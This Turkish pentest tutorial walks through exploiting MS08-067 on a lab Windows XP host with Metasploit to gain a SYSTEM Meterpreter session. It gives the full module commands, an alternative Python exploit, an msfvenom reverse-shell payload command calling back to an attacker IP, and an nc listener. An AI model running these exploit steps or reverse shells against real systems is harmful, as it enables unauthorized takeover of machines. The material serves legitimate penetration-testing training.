MSF ms08_067_netapi İstismar Modülü ile İşletim Sistemi Zafiyetin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

0
298
views
Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda Windows XP SPO işletim sisteminde MS08-067 zafiyetinin Metasploit Framework ile istismar edilecek ve SYSTEM hakları ile Meterpreter bağlantısı elde edilecektir.

Nessus ile zafiyet taraması sonucunda 192.168.244.138 IP adresli bilgisayarda MS08-067 zafiyetinin tespit edildiği görülmektedir.

acquiring-meterpreter-shell-on-windows-by-using-msf-ms08-067-netapi-module-01

Bu zafiyeti istismar etmek için Kali sağıtımı üzerindeki Metasploit Framework kullanılabilir. Bu işlem için öncelikle Kali’deki komut satırından MSF’in komut satırına erişilir.

msfconsole -q

Metasploit üzerinde ilgili modülün (MSF ms08_067_netapi istismar modülü) seçenekleri aşağıdaki gibidir:

search ms08-067
use exploit/windows/smb/ms08_067_netapi
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-ms08-067-netapi-module-02

Seçenek olarak hedef IP adresinin ayarlanması yeterlidir. Böylece modül çalıştırılabilir.

set RHOST 192.168.244.138
show options
exploit

acquiring-meterpreter-shell-on-windows-by-using-msf-ms08-067-netapi-module-03

Modül çalıştırıldığında SYSTEM haklarıyla svchost.exe prosesine enjekte olunduğu görülmektedir.

sysinfo
getuid
getpid
ps

acquiring-meterpreter-shell-on-windows-by-using-msf-ms08-067-netapi-module-04

 

Not: MSF yerine Exploit-db içerisindeki Python kodu da kullanılabilirdi.

https://www.exploit-db.com/exploits/7132/

 

Not: Benzer olarak jivoi tarafından sunulan ms08-067.py isimli Python kodu içerisindeki Shellcode güncellenerek de ters bağlantı elde edilebilir.

  • İstismar Betiği: https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
  • Yeni ShellCode: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=3333 EXITFUNC=thread -b “\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40” -f c -a x86 –platform windows
  • İstismar: python ms08-067.py 10.10.10.9 445
  • Dinleyici: nc -lnvp 3333

 

Bu açıklıkla ilgili ayrıntılı bilgi için Bilgi Güvenliği Kapısı‘nda yayınlanan bağlantıdaki yazı incelenebilir.

 

Kaynaklar:

https://pentestworld.blogspot.com/2019/05/hack-box-legacy.html

 

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

This site uses Akismet to reduce spam. Learn how your comment data is processed.